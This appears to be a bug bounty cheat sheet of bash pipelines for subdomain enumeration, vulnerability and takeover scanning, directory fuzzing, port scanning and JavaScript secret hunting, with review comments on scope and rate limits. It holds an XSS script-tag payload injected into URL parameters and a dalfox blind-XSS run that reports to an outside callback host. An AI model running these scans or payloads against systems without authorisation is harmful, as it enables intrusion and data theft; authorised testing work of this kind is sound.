Description
Battle-tested one-liner command pipelines that chain multiple tools together for efficient bug bounty reconnaissance. These workflows automate the process from initial discovery through vulnerability scanning.
Full Recon Pipeline
BASH
# Passive subdomain enumeration -> live HTTP probe -> nuclei templates,
# restricted to critical and high severity.
# Passive sources can return hostnames that are third-party hosted or stale;
# this one-liner has no scope filter between enumeration and the active
# stages, so every name subfinder prints is probed and scanned.
subfinder -d target.com -silent \
  | httpx -silent \
  | nuclei -s critical,high

# Merge three passive sources, de-duplicate, and keep only the hosts that
# answer over HTTP(S). alive.txt is overwritten on every run.
{
  subfinder -d target.com -silent
  amass enum -passive -d target.com
  assetfinder --subs-only target.com
} \
  | sort -u \
  | httpx -silent > alive.txt
Parameter Discovery → Exploitation
BASH
# Collect parameterised URLs, replace every query value with a script-tag
# marker, then probe the rewritten URLs.
# NOTE(review): httpx -silent only prints the URLs that respond; nothing in
# this pipeline inspects the response body, so its output does not show
# whether the marker was reflected.
# NOTE(review): assumes paramspider writes the URLs to stdout - confirm for
# the installed version, otherwise the later stages receive nothing.
paramspider -d target.com \
  | qsreplace "<script>alert(1)</script>" \
  | httpx -silent

# Archived URLs that contain "=", de-duplicated, piped into dalfox.
# NOTE(review): "https://xss.hunter" looks like a placeholder for a blind-XSS
# callback endpoint. A payload that fires reports to that URL, so it has to
# be an endpoint the tester controls.
gau target.com \
  | grep "=" \
  | sort -u \
  | dalfox pipe --blind "https://xss.hunter"
Subdomain Takeover Check
BASH
# Enumerate subdomains, keep the ones that answer over HTTP(S), and run the
# nuclei templates under takeovers/ against them.
# NOTE(review): "takeovers/" is a relative template path; the directory
# layout of the template repository has changed between releases, so confirm
# it resolves on the installed version.
# A match means the response fits a template's fingerprint; verify the
# underlying DNS record before treating it as a finding.
subfinder -d target.com \
  | httpx -silent \
  | nuclei -t takeovers/
JavaScript Analysis
BASH
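# Crawl the site with JavaScript parsing enabled (-jc), keep URLs that end in
# .js, probe them, and save the live ones to js-files.txt (also echoed to
# stdout by tee).
# NOTE(review): the '\.js$' filter drops script URLs that carry a query
# string, for example a cache-busting ?v= suffix.
katana -u https://target.com -jc \
  | grep '\.js$' \
  | httpx -silent \
  | tee js-files.txt

# Run SecretFinder over each saved URL.
# IFS= and -r keep every line exactly as written (no backslash processing,
# no whitespace trimming); the extra -n test picks up a final line that has
# no trailing newline; the redirect replaces the extra cat process.
# SecretFinder reports regex matches, so hits are candidates to verify, not
# confirmed secrets.
while IFS= read -r url || [ -n "$url" ]; do
  [ -n "$url" ] || continue   # skip blank lines
  python SecretFinder.py -i "$url" -o cli
done < js-files.txt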
Mass Directory Fuzzing
BASH
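# Fuzz the common.txt wordlist against every host in alive.txt: one ffuf run
# per input line, 50 threads per run, reporting only HTTP 200 responses.
# Reading alive.txt by redirect drops the extra cat and makes the command
# fail immediately when the file is missing.
# NOTE(review): a host that answers 200 for any path matches every wordlist
# entry, so -mc 200 alone does not separate real hits from catch-all pages.
# NOTE(review): -t 50 is the per-host concurrency; check it against the
# request-rate limit the program specifies.
xargs -I {} \
  ffuf -u {}/FUZZ \
    -w /usr/share/seclists/Discovery/Web-Content/common.txt \
    -mc 200 -t 50 \
  < alive.txt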
Port Scan → Service Enum
BASH
# rustscan finds the open ports and then hands them to nmap. Everything after
# "--" is nmap's argument list: service/version detection (-sV), the default
# script set (-sC), and output in all three formats (normal, XML, grepable)
# under the detailed-scan prefix (-oA).
rustscan -a target.com -- \
  -sV -sC \
  -oA detailed-scan